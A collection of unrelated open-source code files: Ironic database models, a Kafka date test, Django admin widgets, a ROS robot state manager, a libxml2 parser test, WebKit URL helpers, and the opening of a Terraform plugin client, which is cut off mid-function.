from oslo_config import cfg
from oslo_db import options as db_options
from oslo_db.sqlalchemy import models
import six.moves.urllib.parse as urlparse
from sqlalchemy import Boolean, Column, DateTime
from sqlalchemy import ForeignKey, Integer
from sqlalchemy import schema, String, Text
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.types import TypeDecorator, TEXT
from ironic.common import paths
# Extra database options registered on top of oslo.db's defaults.
sql_opts = [
    cfg.StrOpt('mysql_engine',
               default='InnoDB',
               help='MySQL engine to use.')
]

# Fall back to a local SQLite file when no connection string is configured.
_DEFAULT_SQL_CONNECTION = 'sqlite:///' + paths.state_path_def('ironic.sqlite')

cfg.CONF.register_opts(sql_opts, 'database')
db_options.set_defaults(cfg.CONF, _DEFAULT_SQL_CONNECTION, 'ironic.sqlite')
def table_args():
    """Return engine-specific table kwargs for model __table_args__.

    MySQL gets an explicit engine and charset; any other backend
    gets None (no extra arguments).
    """
    scheme = urlparse.urlparse(cfg.CONF.database.connection).scheme
    if scheme != 'mysql':
        return None
    return {'mysql_engine': cfg.CONF.database.mysql_engine,
            'mysql_charset': "utf8"}
class JsonEncodedType(TypeDecorator):
    """Abstract base type serialized as json-encoded string in db."""

    # Concrete subclasses set this to the Python container type the
    # column stores (dict, list, ...).
    type = None
    impl = TEXT

    def process_bind_param(self, value, dialect):
        """Serialize *value* to JSON before it is written to the db."""
        if value is None:
            # Store the type's empty default so reads stay consistent.
            value = self.type()
        elif not isinstance(value, self.type):
            raise TypeError("%s supposes to store %s objects, but %s given"
                            % (self.__class__.__name__,
                               self.type.__name__,
                               type(value).__name__))
        return json.dumps(value)

    def process_result_value(self, value, dialect):
        """Deserialize a JSON string read from the db; None passes through."""
        return value if value is None else json.loads(value)
# Concrete JSON column types; `type` drives validation and the empty
# default in JsonEncodedType.
class JSONEncodedDict(JsonEncodedType):
    """Represents dict serialized as json-encoded string in db."""
    type = dict


class JSONEncodedList(JsonEncodedType):
    """Represents list serialized as json-encoded string in db."""
    type = list
class IronicBase(models.TimestampMixin,
                 models.ModelBase):
    """Common base for Ironic models: timestamps plus dict conversion."""

    metadata = None

    def as_dict(self):
        """Return the row as a plain dict keyed by column name."""
        return {col.name: self[col.name] for col in self.__table__.columns}

    def save(self, session=None):
        """Persist the model, creating a session when none is supplied."""
        # Imported here to avoid a circular import with the db api module.
        import ironic.db.sqlalchemy.api as db_api
        if session is None:
            session = db_api.get_session()
        super(IronicBase, self).save(session)


Base = declarative_base(cls=IronicBase)
class Chassis(Base):
    """Represents a hardware chassis."""

    __tablename__ = 'chassis'
    __table_args__ = (
        schema.UniqueConstraint('uuid', name='uniq_chassis0uuid'),
        table_args()
    )
    id = Column(Integer, primary_key=True)  # surrogate key
    uuid = Column(String(36))  # externally-visible identifier
    extra = Column(JSONEncodedDict)  # free-form metadata
    description = Column(String(255), nullable=True)
class Conductor(Base):
    """Represents a conductor service entry."""

    __tablename__ = 'conductors'
    __table_args__ = (
        schema.UniqueConstraint('hostname', name='uniq_conductors0hostname'),
        table_args()
    )
    id = Column(Integer, primary_key=True)
    hostname = Column(String(255), nullable=False)  # unique service host
    drivers = Column(JSONEncodedList)  # driver names this conductor loads
    online = Column(Boolean, default=True)
class Node(Base):
    """Represents a bare metal node."""

    __tablename__ = 'nodes'
    __table_args__ = (
        schema.UniqueConstraint('uuid', name='uniq_nodes0uuid'),
        schema.UniqueConstraint('instance_uuid',
                                name='uniq_nodes0instance_uuid'),
        schema.UniqueConstraint('name', name='uniq_nodes0name'),
        table_args())
    id = Column(Integer, primary_key=True)
    uuid = Column(String(36))
    # NOTE(deva): we store instance_uuid directly on the node so that we can
    #             filter on it more efficiently, even though it is
    #             user-settable, and would otherwise be in node.properties.
    instance_uuid = Column(String(36), nullable=True)
    name = Column(String(255), nullable=True)
    chassis_id = Column(Integer, ForeignKey('chassis.id'), nullable=True)
    # Current vs. desired state pairs; conductors drive each node from the
    # current value toward its target.
    power_state = Column(String(15), nullable=True)
    target_power_state = Column(String(15), nullable=True)
    provision_state = Column(String(15), nullable=True)
    target_provision_state = Column(String(15), nullable=True)
    provision_updated_at = Column(DateTime, nullable=True)
    last_error = Column(Text, nullable=True)
    instance_info = Column(JSONEncodedDict)
    properties = Column(JSONEncodedDict)
    driver = Column(String(15))
    driver_info = Column(JSONEncodedDict)
    driver_internal_info = Column(JSONEncodedDict)
    clean_step = Column(JSONEncodedDict)
    # NOTE(deva): this is the host name of the conductor which has
    #             acquired a TaskManager lock on the node.
    #             We should use an INT FK (conductors.id) in the future.
    reservation = Column(String(255), nullable=True)
    # NOTE(deva): this is the id of the last conductor which prepared local
    #             state for the node (eg, a PXE config file).
    #             When affinity and the hash ring's mapping do not match,
    #             this indicates that a conductor should rebuild local state.
    conductor_affinity = Column(Integer,
                                ForeignKey('conductors.id',
                                           name='nodes_conductor_affinity_fk'),
                                nullable=True)
    maintenance = Column(Boolean, default=False)
    maintenance_reason = Column(Text, nullable=True)
    console_enabled = Column(Boolean, default=False)
    inspection_finished_at = Column(DateTime, nullable=True)
    inspection_started_at = Column(DateTime, nullable=True)
    extra = Column(JSONEncodedDict)
class Port(Base):
    """Represents a network port of a bare metal node."""

    __tablename__ = 'ports'
    __table_args__ = (
        schema.UniqueConstraint('address', name='uniq_ports0address'),
        schema.UniqueConstraint('uuid', name='uniq_ports0uuid'),
        table_args())
    id = Column(Integer, primary_key=True)
    uuid = Column(String(36))
    address = Column(String(18))  # MAC address, unique across all ports
    node_id = Column(Integer, ForeignKey('nodes.id'), nullable=True)
    extra = Column(JSONEncodedDict)
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.kafka.connect.data;
import org.apache.kafka.connect.errors.DataException;
import org.junit.jupiter.api.Test;
import java.util.Calendar;
import java.util.GregorianCalendar;
import java.util.TimeZone;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertThrows;
public class DateTest {
    // Fixed reference calendars; all pinned to UTC so day arithmetic is
    // deterministic regardless of the host timezone.
    private static final GregorianCalendar EPOCH;
    private static final GregorianCalendar EPOCH_PLUS_TEN_THOUSAND_DAYS;
    private static final GregorianCalendar EPOCH_PLUS_TIME_COMPONENT;
    static {
        EPOCH = new GregorianCalendar(1970, Calendar.JANUARY, 1, 0, 0, 0);
        EPOCH.setTimeZone(TimeZone.getTimeZone("UTC"));

        // Same instant as EPOCH but with a 1-second time-of-day component,
        // which the Date logical type must reject.
        EPOCH_PLUS_TIME_COMPONENT = new GregorianCalendar(1970, Calendar.JANUARY, 1, 0, 0, 1);
        EPOCH_PLUS_TIME_COMPONENT.setTimeZone(TimeZone.getTimeZone("UTC"));

        EPOCH_PLUS_TEN_THOUSAND_DAYS = new GregorianCalendar(1970, Calendar.JANUARY, 1, 0, 0, 0);
        EPOCH_PLUS_TEN_THOUSAND_DAYS.setTimeZone(TimeZone.getTimeZone("UTC"));
        EPOCH_PLUS_TEN_THOUSAND_DAYS.add(Calendar.DATE, 10000);
    }

    @Test
    public void testBuilder() {
        Schema plain = Date.SCHEMA;
        assertEquals(Date.LOGICAL_NAME, plain.name());
        // The (Object) cast selects the Object overload of assertEquals;
        // version() returns a boxed Integer.
        assertEquals(1, (Object) plain.version());
    }

    @Test
    public void testFromLogical() {
        // fromLogical converts a java.util.Date into days since epoch.
        assertEquals(0, Date.fromLogical(Date.SCHEMA, EPOCH.getTime()));
        assertEquals(10000, Date.fromLogical(Date.SCHEMA, EPOCH_PLUS_TEN_THOUSAND_DAYS.getTime()));
    }

    @Test
    public void testFromLogicalInvalidSchema() {
        // A schema without the Date logical name must be rejected.
        assertThrows(DataException.class,
            () -> Date.fromLogical(Date.builder().name("invalid").build(), EPOCH.getTime()));
    }

    @Test
    public void testFromLogicalInvalidHasTimeComponents() {
        // Values with a non-zero time-of-day are not valid dates.
        assertThrows(DataException.class,
            () -> Date.fromLogical(Date.SCHEMA, EPOCH_PLUS_TIME_COMPONENT.getTime()));
    }

    @Test
    public void testToLogical() {
        // toLogical converts days since epoch back into java.util.Date.
        assertEquals(EPOCH.getTime(), Date.toLogical(Date.SCHEMA, 0));
        assertEquals(EPOCH_PLUS_TEN_THOUSAND_DAYS.getTime(), Date.toLogical(Date.SCHEMA, 10000));
    }

    @Test
    public void testToLogicalInvalidSchema() {
        assertThrows(DataException.class,
            () -> Date.toLogical(Date.builder().name("invalid").build(), 0));
    }
}
|
java
|
github
|
https://github.com/apache/kafka
|
connect/api/src/test/java/org/apache/kafka/connect/data/DateTest.java
|
# frozen_string_literal: true
# Job whose queue name carries the "production" prefix; used by the
# queue-naming tests.
class PrefixedJob < ActiveJob::Base
  self.queue_name_prefix = "production"

  def perform; end
end
|
ruby
|
github
|
https://github.com/rails/rails
|
activejob/test/jobs/prefixed_job.rb
|
"""
Form Widget classes specific to the Django admin site.
"""
from itertools import chain
from django import forms
from django.forms.widgets import RadioFieldRenderer, RadioChoiceInput
from django.utils.encoding import force_str
from django.utils.safestring import mark_safe
from django.utils.html import conditional_escape
from django.utils.translation import ugettext as _
from util import vendor
class AdminDateWidget(forms.DateInput):
    """Date input rendered inside a Bootstrap datepicker input-group."""

    @property
    def media(self):
        # Widget-specific js/css bundled through xadmin's vendor() helper.
        return vendor('datepicker.js', 'datepicker.css', 'xadmin.widget.datetime.js')

    def __init__(self, attrs=None, format=None):
        final_attrs = {'class': 'date-field', 'size': '10'}
        if attrs is not None:
            final_attrs.update(attrs)
        super(AdminDateWidget, self).__init__(attrs=final_attrs, format=format)

    def render(self, name, value, attrs=None):
        input_html = super(AdminDateWidget, self).render(name, value, attrs)
        # Wrap the bare <input> in datepicker markup with a "Today" button.
        return mark_safe('<div class="input-group date bootstrap-datepicker"><span class="input-group-addon"><i class="fa fa-calendar"></i></span>%s'
                         '<span class="input-group-btn"><button class="btn btn-default" type="button">%s</button></span></div>' % (input_html, _(u'Today')))
class AdminTimeWidget(forms.TimeInput):
    """Time input rendered inside a Bootstrap timepicker input-group."""

    @property
    def media(self):
        return vendor('datepicker.js','timepicker.js', 'timepicker.css', 'xadmin.widget.datetime.js')

    def __init__(self, attrs=None, format=None):
        final_attrs = {'class': 'time-field', 'size': '8'}
        if attrs is not None:
            final_attrs.update(attrs)
        super(AdminTimeWidget, self).__init__(attrs=final_attrs, format=format)

    def render(self, name, value, attrs=None):
        input_html = super(AdminTimeWidget, self).render(name, value, attrs)
        # Wrap the bare <input> in timepicker markup with a "Now" button.
        return mark_safe('<div class="input-group time bootstrap-timepicker"><span class="input-group-addon"><i class="fa fa-clock-o">'
                         '</i></span>%s<span class="input-group-btn"><button class="btn btn-default" type="button">%s</button></span></div>' % (input_html, _(u'Now')))
class AdminSelectWidget(forms.Select):
    """Select widget enhanced by xadmin's select plugin assets."""

    @property
    def media(self):
        return vendor('select.js', 'select.css', 'xadmin.widget.select.js')
class AdminSplitDateTime(forms.SplitDateTimeWidget):
    """
    A SplitDateTime Widget that has some admin-specific styling.
    """

    def __init__(self, attrs=None):
        widgets = [AdminDateWidget, AdminTimeWidget]
        # Note that we're calling MultiWidget, not SplitDateTimeWidget, because
        # we want to define widgets.
        forms.MultiWidget.__init__(self, widgets, attrs)

    def format_output(self, rendered_widgets):
        # Place date and time inputs side by side in one clearfix row.
        return mark_safe(u'<div class="datetime clearfix">%s%s</div>' %
                         (rendered_widgets[0], rendered_widgets[1]))
class AdminRadioInput(RadioChoiceInput):
    """Radio input rendered with Bootstrap radio / radio-inline markup."""

    def render(self, name=None, value=None, attrs=None, choices=()):
        # Fall back to the values captured by the renderer when the caller
        # does not supply overrides.
        # NOTE(review): `or` also discards falsy overrides ('' or 0) --
        # confirm callers never pass those intentionally.
        name = name or self.name
        value = value or self.value
        attrs = attrs or self.attrs
        # Strip form-control; Bootstrap radios are unstyled inputs.
        attrs['class'] = attrs.get('class', '').replace('form-control', '')
        if 'id' in self.attrs:
            label_for = ' for="%s_%s"' % (self.attrs['id'], self.index)
        else:
            label_for = ''
        choice_label = conditional_escape(force_str(self.choice_label))
        if attrs.get('inline', False):
            return mark_safe(u'<label%s class="radio-inline">%s %s</label>' % (label_for, self.tag(), choice_label))
        else:
            return mark_safe(u'<div class="radio"><label%s>%s %s</label></div>' % (label_for, self.tag(), choice_label))
class AdminRadioFieldRenderer(RadioFieldRenderer):
    """Renderer that yields AdminRadioInput instances instead of the default."""

    def __iter__(self):
        for i, choice in enumerate(self.choices):
            yield AdminRadioInput(self.name, self.value, self.attrs.copy(), choice, i)

    def __getitem__(self, idx):
        choice = self.choices[idx]  # Let the IndexError propagate
        return AdminRadioInput(self.name, self.value, self.attrs.copy(), choice, idx)

    def render(self):
        return mark_safe(u'\n'.join([force_str(w) for w in self]))


class AdminRadioSelect(forms.RadioSelect):
    """RadioSelect wired to the Bootstrap-aware renderer above."""
    renderer = AdminRadioFieldRenderer
class AdminCheckboxSelect(forms.CheckboxSelectMultiple):
    """Checkbox group rendered with Bootstrap checkbox markup."""

    def render(self, name, value, attrs=None, choices=()):
        if value is None:
            value = []
        has_id = attrs and 'id' in attrs
        final_attrs = self.build_attrs(attrs, name=name)
        output = []
        # Normalize to strings
        str_values = set([force_str(v) for v in value])
        for i, (option_value, option_label) in enumerate(chain(self.choices, choices)):
            # If an ID attribute was given, add a numeric index as a suffix,
            # so that the checkboxes don't all have the same ID attribute.
            if has_id:
                final_attrs = dict(final_attrs, id='%s_%s' % (attrs['id'], i))
                label_for = u' for="%s"' % final_attrs['id']
            else:
                label_for = ''
            # check_test marks the box when its value is in the selection.
            cb = forms.CheckboxInput(
                final_attrs, check_test=lambda value: value in str_values)
            option_value = force_str(option_value)
            rendered_cb = cb.render(name, option_value)
            option_label = conditional_escape(force_str(option_label))
            if final_attrs.get('inline', False):
                output.append(u'<label%s class="checkbox-inline">%s %s</label>' % (label_for, rendered_cb, option_label))
            else:
                output.append(u'<div class="checkbox"><label%s>%s %s</label></div>' % (label_for, rendered_cb, option_label))
        return mark_safe(u'\n'.join(output))
# The widgets below only inject an admin-specific css class (or template)
# and otherwise defer entirely to the stock Django widget.

class AdminSelectMultiple(forms.SelectMultiple):
    """Multi-select styled with the 'select-multi' css class."""
    def __init__(self, attrs=None):
        final_attrs = {'class': 'select-multi'}
        if attrs is not None:
            final_attrs.update(attrs)
        super(AdminSelectMultiple, self).__init__(attrs=final_attrs)


class AdminFileWidget(forms.ClearableFileInput):
    """File input with admin wrappers around the default templates."""
    template_with_initial = (u'<p class="file-upload">%s</p>'
                             % forms.ClearableFileInput.template_with_initial)
    template_with_clear = (u'<span class="clearable-file-input">%s</span>'
                           % forms.ClearableFileInput.template_with_clear)


class AdminTextareaWidget(forms.Textarea):
    """Textarea styled with the 'textarea-field' css class."""
    def __init__(self, attrs=None):
        final_attrs = {'class': 'textarea-field'}
        if attrs is not None:
            final_attrs.update(attrs)
        super(AdminTextareaWidget, self).__init__(attrs=final_attrs)


class AdminTextInputWidget(forms.TextInput):
    """Text input styled with the 'text-field' css class."""
    def __init__(self, attrs=None):
        final_attrs = {'class': 'text-field'}
        if attrs is not None:
            final_attrs.update(attrs)
        super(AdminTextInputWidget, self).__init__(attrs=final_attrs)


class AdminURLFieldWidget(forms.TextInput):
    """URL input styled with the 'url-field' css class."""
    def __init__(self, attrs=None):
        final_attrs = {'class': 'url-field'}
        if attrs is not None:
            final_attrs.update(attrs)
        super(AdminURLFieldWidget, self).__init__(attrs=final_attrs)


class AdminIntegerFieldWidget(forms.TextInput):
    """Integer input styled with the 'int-field' css class."""
    def __init__(self, attrs=None):
        final_attrs = {'class': 'int-field'}
        if attrs is not None:
            final_attrs.update(attrs)
        super(AdminIntegerFieldWidget, self).__init__(attrs=final_attrs)


class AdminCommaSeparatedIntegerFieldWidget(forms.TextInput):
    """Comma-separated-integers input styled with 'sep-int-field'."""
    def __init__(self, attrs=None):
        final_attrs = {'class': 'sep-int-field'}
        if attrs is not None:
            final_attrs.update(attrs)
        super(AdminCommaSeparatedIntegerFieldWidget,
              self).__init__(attrs=final_attrs)
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
import rospy, os
from std_msgs.msg import String
from std_msgs.msg import Bool
# Module-level state shared between command_parser() and state_manager().
# Subsystem activation flags, each published as a Bool topic:
mapping = False
navigation = False
autonomous = False
manual = False
motion_detection = False
capture = False  # one-shot camera capture request
submit = False  # whether alerts are emailed as well as saved locally
command = "Standby"  # name of the current state, published as a String
sys_comm = ""  # pass-through system command (e.g. "reset")
timer = 0.0  # rospy timestamp of the last manual capture request
def command_parser(cmd):
    """Map a console command string onto the global state flags.

    Returns the name of the new state, or the previous state (the global
    ``command``) for commands that do not change state. Side effects:
    mutates the module-level flags that state_manager() publishes.
    """
    global mapping, navigation, autonomous, manual, motion_detection, sys_comm, capture, timer, submit
    last_cmd = command
    # State changes are only allowed from Standby (see print_usage rule 1).
    if cmd == "map -m" and last_cmd == "Standby":
        mapping = True
        navigation = True
        motion_detection = False
        autonomous = False
        manual = True
        return "Manual Mapping"
    if cmd == "map -a" and last_cmd == "Standby":
        mapping = True
        navigation = True
        motion_detection = False
        autonomous = True
        manual = False
        return "Autonomous Mapping"
    if cmd == "map -s":
        if mapping is True:
            print("\nSAVING MAP...")
            os.system("rosrun map_server map_saver -f /home/trevor/ROS/catkin_ws/src/asr/maps/asr_map && echo '\n'")
        else:
            print("\nERROR: MAP CAN ONLY BE SAVED WHILE THE MAPPING STATE IS ACTIVE")
        return last_cmd
    if cmd == "map -r":
        if mapping is True:
            print("\nRESETTING MAP...")
            # Picked up by state_manager() and published on /syscommand.
            sys_comm = "reset"
        else:
            print("\nERROR: MAP CAN ONLY BE RESET WHILE THE MAPPING STATE IS ACTIVE")
        return last_cmd
    if cmd == "capture":
        if motion_detection is True:
            print("\nCAPTURING IMAGE FROM CAMERA...")
            capture = True
            timer = rospy.get_time()
        else:
            print("\nERROR: IMAGES CAN ONLY BE MANUALLY CAPTURED WHILE THE PATROL STATE IS ACTIVE")
            capture = False
        return last_cmd
    if cmd == "submit_alerts -t":
        submit = True
        print("\nALERTS WILL BE EMAILED AND SAVED LOCALLY")
        # BUG FIX: previously fell through to the usage-error branch below,
        # printing a spurious USAGE ERROR for a valid command.
        return last_cmd
    if cmd == "submit_alerts -f":
        submit = False
        print("\nALERTS WILL NOT BE EMAILED BUT THEY WILL BE SAVED LOCALLY")
        # BUG FIX: same fall-through as above.
        return last_cmd
    if cmd == "patrol -m" and last_cmd == "Standby":
        mapping = False
        navigation = True
        motion_detection = True
        autonomous = False
        manual = True
        return "Manual Patrol"
    if cmd == "patrol -a" and last_cmd == "Standby":
        mapping = False
        navigation = True
        motion_detection = True
        autonomous = True
        manual = False
        return "Autonomous Patrol"
    if cmd == "standby":
        mapping = False
        navigation = False
        motion_detection = False
        autonomous = False
        manual = False
        return "Standby"
    if cmd == "shutdown":
        mapping = False
        navigation = False
        motion_detection = False
        autonomous = False
        manual = False
        return "Shutdown"
    if cmd == "help":
        print("\n**************************** HELP ****************************\n")
        print_usage()
        return last_cmd
    else:
        # Unknown command, or a state change attempted outside Standby.
        print("\n************************ USAGE ERROR *************************\n")
        print_usage()
        return last_cmd
def print_state():
    """Print the current command state and every mode flag to stdout."""
    # CONSISTENCY FIX: ``navigation`` is reported below but was missing from
    # the original global declaration.  (``global`` is not required for
    # reads; the statement is kept to match the module's existing style.)
    global mapping, navigation, motion_detection, autonomous, manual, command
    print("\nCurrent State: " + str(command))
    print("    Autonomous: " + str(autonomous))
    print("    Manual: " + str(manual))
    print("    Mapping: " + str(mapping))
    print("    Navigation: " + str(navigation))
    print("    Motion Detection: " + str(motion_detection))
def print_usage():
    """Print the usage rules and the list of valid operator commands."""
    usage_lines = [
        "USAGE:",
        "1) User must execute 'standby' command before switching states",
        "2) User must enter only valid commands",
        "    Valid commands are:\n\tmap -m\n\tmap -a\n\tmap -s\n\tmap -r\n\tpatrol -m\n\tpatrol -a"
        "\n\tsubmit_alerts -t\n\tsubmit_alerts -f\n\tstandby\n\tshutdown\n\thelp",
        "\n****************************************************************",
    ]
    for line in usage_lines:
        print(line)
def shutdown_hook():
    """Announce system shutdown (used when the 'shutdown' command is given)."""
    message = "\n...SYSTEM SHUTTING DOWN..."
    print(message)
def state_manager():
    """Main operator loop: parse commands and publish the resulting state.

    Publishes the state name on ``current_state`` plus one topic per mode
    flag each time a command is entered, drives the timed image-capture
    sequence, and shuts the node down on the "Shutdown" command.
    """
    global mapping, navigation, autonomous, manual, command, sys_comm, capture, timer, submit
    rospy.init_node('state_manager', anonymous=False)
    state_pub = rospy.Publisher('current_state', String, queue_size=10)
    mapping_pub = rospy.Publisher('mapping_active', Bool, queue_size=10)
    nav_pub = rospy.Publisher('nav_active', Bool, queue_size=10)
    md_pub = rospy.Publisher('md_active', Bool, queue_size=10)
    autonomous_pub = rospy.Publisher('autonomous_active', Bool, queue_size=10)
    manual_pub = rospy.Publisher('manual_active', Bool, queue_size=10)
    sys_pub = rospy.Publisher('syscommand', String, queue_size=10)
    capture_pub = rospy.Publisher('cam_capture', Bool, queue_size=10)
    submit_pub = rospy.Publisher('submit_alerts', Bool, queue_size=10)
    rate = rospy.Rate(10)  # 10hz
    print("************************** ASR ONLINE **************************\n")
    print_usage()
    print_state()
    while not rospy.is_shutdown():
        command = command_parser(raw_input("\nasr$: "))
        print_state()
        state_pub.publish(command)
        mapping_pub.publish(mapping)
        nav_pub.publish(navigation)
        md_pub.publish(motion_detection)
        autonomous_pub.publish(autonomous)
        manual_pub.publish(manual)
        sys_pub.publish(sys_comm)
        capture_pub.publish(capture)
        submit_pub.publish(submit)
        if capture is True:
            time_since_capture = abs(rospy.get_time() - timer)
            print("\nImages being captured, please wait...")
            # Wait until at least 3 seconds have elapsed since the capture
            # request.  FIX: sleep briefly each pass instead of busy-spinning
            # the CPU as the original loop did.
            while not time_since_capture >= 3:
                rospy.sleep(0.1)
                time_since_capture = abs(rospy.get_time() - timer)
            print("\nImage capture complete!")
            capture = False
            capture_pub.publish(capture)
            timer = 0.0
        if command == "Shutdown":
            # BUG FIX: rospy.signal_shutdown() expects a reason string; the
            # original passed shutdown_hook()'s return value, which is None.
            shutdown_hook()
            rospy.signal_shutdown("shutdown command received")
        rate.sleep()
# Script entry point: run the interactive state manager until ROS shuts down.
if __name__ == '__main__':
    try:
        state_manager()
    except rospy.ROSInterruptException:
        # Raised by rospy when the node is interrupted (e.g. Ctrl-C);
        # a quiet exit is the desired behaviour here.
        pass
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/python -u
import sys
import libxml2
# Memory debug specific: enable libxml2's internal allocation tracking so the
# leak check at the end of this script can report outstanding bytes.
libxml2.debugMemory(1)
# Accumulated SAX event trace; appended to by the callback handler below and
# compared against the expected reference strings.
log = ""
class callback:
    """SAX handler that records every parser event into the global ``log``."""

    def startDocument(self):
        global log
        log += "startDocument:"

    def endDocument(self):
        global log
        log += "endDocument:"

    def startElement(self, tag, attrs):
        global log
        log += "startElement %s %s:" % (tag, attrs)

    def endElement(self, tag):
        global log
        log += "endElement %s:" % (tag)

    def characters(self, data):
        global log
        log += "characters: %s:" % (data)

    def warning(self, msg):
        global log
        log += "warning: %s:" % (msg)

    def error(self, msg):
        global log
        log += "error: %s:" % (msg)

    def fatalError(self, msg):
        global log
        log += "fatalError: %s:" % (msg)
handler = callback()


def check_push_parse(chunk, reference):
    """Push-parse ``chunk`` and exit(1) if the SAX event log != ``reference``.

    FIX: this helper replaces seven near-identical copy/pasted test chunks,
    and corrects the "Exprected" typo in the failure message.
    """
    global log
    log = ""
    ctxt = libxml2.createPushParser(handler, None, 0, "test.xml")
    ctxt.parseChunk(chunk, len(chunk), 0)
    # Drop the parser reference so its memory is released before the
    # leak check at the end of the script.
    ctxt = None
    if log != reference:
        print("Error got: %s" % log)
        print("Expected: %s" % reference)
        sys.exit(1)


# Self-closing element.
check_push_parse("""<foo><bar2/>""",
                 "startDocument:startElement foo None:startElement bar2 None:endElement bar2:")
# Explicit open/close pair.
check_push_parse("""<foo><bar2></bar2>""",
                 "startDocument:startElement foo None:startElement bar2 None:endElement bar2:")
# Unclosed element: no endElement event expected yet.
check_push_parse("""<foo><bar2>""",
                 "startDocument:startElement foo None:startElement bar2 None:")
# Self-closing element with attributes in both quote styles.
check_push_parse("""<foo><bar2 a="1" b='2' />""",
                 "startDocument:startElement foo None:startElement bar2 {'a': '1', 'b': '2'}:endElement bar2:")
# Unclosed element with attributes.
check_push_parse("""<foo><bar2 a="1" b='2' >""",
                 "startDocument:startElement foo None:startElement bar2 {'a': '1', 'b': '2'}:")
# Open/close pair with attributes.
check_push_parse("""<foo><bar2 a="1" b='2' ></bar2>""",
                 "startDocument:startElement foo None:startElement bar2 {'a': '1', 'b': '2'}:endElement bar2:")
# Malformed attribute (unterminated quote): parsing stops after <foo>.
check_push_parse("""<foo><bar2 a="b='1' />""",
                 "startDocument:startElement foo None:")

# Memory debug specific: verify libxml2 released everything it allocated.
libxml2.cleanupParser()
if libxml2.debugMemory(1) == 0:
    print("OK")
else:
    print("Memory leak %d bytes" % (libxml2.debugMemory(1)))
    libxml2.dumpMemory()
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright (c) 2010, Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import re
def view_source_url(local_path):
    """Return the trac.webkit.org browser URL for *local_path* at trunk."""
    base = "http://trac.webkit.org/browser/trunk/%s"
    return base % local_path
def view_revision_url(revision_number):
    """Return the trac.webkit.org changeset URL for *revision_number*."""
    return "http://trac.webkit.org/changeset/{0}".format(revision_number)
contribution_guidelines = "http://webkit.org/coding/contributing.html"
bug_server_domain = "webkit.org"
bug_server_host = "bugs." + bug_server_domain
_bug_server_regex = "https?://%s/" % re.sub('\.', '\\.', bug_server_host)
bug_server_url = "https://%s/" % bug_server_host
bug_url_long = _bug_server_regex + r"show_bug\.cgi\?id=(?P<bug_id>\d+)(&ctype=xml|&excludefield=attachmentdata)*"
bug_url_short = r"https?\://%s/b/(?P<bug_id>\d+)" % bug_server_domain
attachment_url = _bug_server_regex + r"attachment\.cgi\?id=(?P<attachment_id>\d+)(&action=(?P<action>\w+))?"
direct_attachment_url = r"https?://bug-(?P<bug_id>\d+)-attachments.%s/attachment\.cgi\?id=(?P<attachment_id>\d+)" % bug_server_domain
buildbot_url = "http://build.webkit.org"
def parse_bug_id(string):
    """Extract a WebKit bug id from *string*, or return None if none found."""
    if not string:
        return None
    # Try the short b/NNN form first, then the full show_bug.cgi form,
    # exactly as the original did.
    for pattern in (bug_url_short, bug_url_long):
        match = re.search(pattern, string)
        if match:
            return int(match.group('bug_id'))
    return None
def parse_attachment_id(string):
    """Extract an attachment id from *string*, or return None if none found."""
    if not string:
        return None
    # Check the bug-server attachment URL first, then the per-bug
    # attachments subdomain form, preserving the original order.
    for pattern in (attachment_url, direct_attachment_url):
        match = re.search(pattern, string)
        if match:
            return int(match.group('attachment_id'))
    return None
|
unknown
|
codeparrot/codeparrot-clean
| ||
// Copyright (c) HashiCorp, Inc.
// SPDX-License-Identifier: BUSL-1.1
package cloudplugin1
import (
"context"
"fmt"
"io"
"log"
"github.com/hashicorp/terraform/internal/cloudplugin/cloudproto1"
"github.com/hashicorp/terraform/internal/pluginshared"
)
// GRPCCloudClient is the client interface for interacting with terraform-cloudplugin
type GRPCCloudClient struct {
	client  cloudproto1.CommandServiceClient // gRPC stub used to issue Execute calls
	context context.Context                  // context applied to every outgoing request
}

// Proof that GRPCCloudClient fulfills the go-plugin interface
var _ pluginshared.CustomPluginClient = GRPCCloudClient{}
// Execute sends the client Execute request and waits for the plugin to return
// an exit code response before returning
func (c GRPCCloudClient) Execute(args []string, stdout, stderr io.Writer) int {
	client, err := c.client.Execute(c.context, &cloudproto1.CommandRequest{
		Args: args,
	})

	if err != nil {
